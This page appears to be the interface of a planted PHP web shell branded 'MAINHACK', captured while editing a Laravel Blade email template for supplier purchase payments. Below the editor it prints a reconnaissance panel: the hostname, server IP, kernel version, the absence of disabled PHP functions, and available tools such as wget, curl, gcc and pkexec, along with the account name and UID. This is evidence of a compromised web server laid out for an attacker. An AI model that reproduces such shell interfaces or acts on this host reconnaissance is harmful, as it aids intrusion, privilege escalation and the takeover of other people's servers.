[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: purchase-payment.blade.php
@extends('email') @section('email-body') <tr> <td class="email-body" width="570" cellpadding="0" cellspacing="0"> <table class="email-body_inner" align="center" width="570" cellpadding="0" cellspacing="0" role="presentation"> <!-- Body content --> <tr> <td class="content-cell"> <div class="f-fallback"> <h1>Hi {{ $purchase['supplier']['name'] }}, thanks!</h1> <p> @lang('We have successfully paid your payment for the purchase. Below are the payment details for your reference. For more information, you can also check your original purchase invoice by clicking') <a href="{{ route('email.purchase.pdf', $purchase->slug) }}">here</a>. </p> <table class="attributes" width="100%" cellpadding="0" cellspacing="0" role="presentation"> <tr> <td class="attributes_content border_bottom"> <table width="100%" cellpadding="0" cellspacing="0" role="presentation"> <tr> <td class="attributes_item"> <span class="f-fallback"> <strong>@lang('Purchase No'): </strong> {{ config('config.purchasePrefix') . '-' . $purchase->purchase_no }} </span> </td> </tr> <tr> <td class="attributes_item"> <span class="f-fallback"> <strong>@lang('Total'): </strong> @currency($purchase->purchaseTotal()) </span> </td> </tr> <tr> <td class="attributes_item"> <span class="f-fallback"> <strong>@lang('Paid Now'): </strong> @currency($purchase['amount_paid']) </span> </td> </tr> <tr> <td class="attributes_item"> <span class="f-fallback"> <strong>@lang('Total Paid'): </strong> @currency($purchase->purchaseTotalPaid()) </span> </td> </tr> <tr> <td class="attributes_item"> <span class="f-fallback"> <strong>@lang('Due'): </strong> @currency($purchase->totalDue()) </span> </td> </tr> </table> </td> </tr> </table> <p>@lang('Here is an updated overview of our outstanding dues, including both purchase and non-purchase amounts:')</p> <table class="attributes" width="100%" cellpadding="0" cellspacing="0" role="presentation"> <tr> <td class="attributes_content"> <table width="100%" cellpadding="0" cellspacing="0" role="presentation"> <tr> <td class="attributes_item"> <span class="f-fallback"> <strong>@lang('Total Purchase Due'): </strong> @currency($purchase['supplier']->purchaseTotalDue()) </span> </td> </tr> <tr> <td class="attributes_item"> <span class="f-fallback"> <strong>@lang('Total Non Purchase Due'): </strong> @currency($purchase['supplier']->nonPurchaseCurrentDue()) </span> </td> </tr> <tr> <td class="attributes_item"> <span class="f-fallback"> <strong>@lang('Total Due'): </strong> @currency($purchase['supplier']->purchaseTotalDue() + $purchase['supplier']->nonPurchaseCurrentDue()) </span> </td> </tr> </table> </td> </tr> </table> <!-- Action --> <br /> <p>Thanks, <br>{{ config('config.companyName') }},<br /> {{ config('config.companyPhoneNumber') }} </p> <!-- Sub copy --> </div> </td> </tr> </table> </td> </tr> @endsection
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.87 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002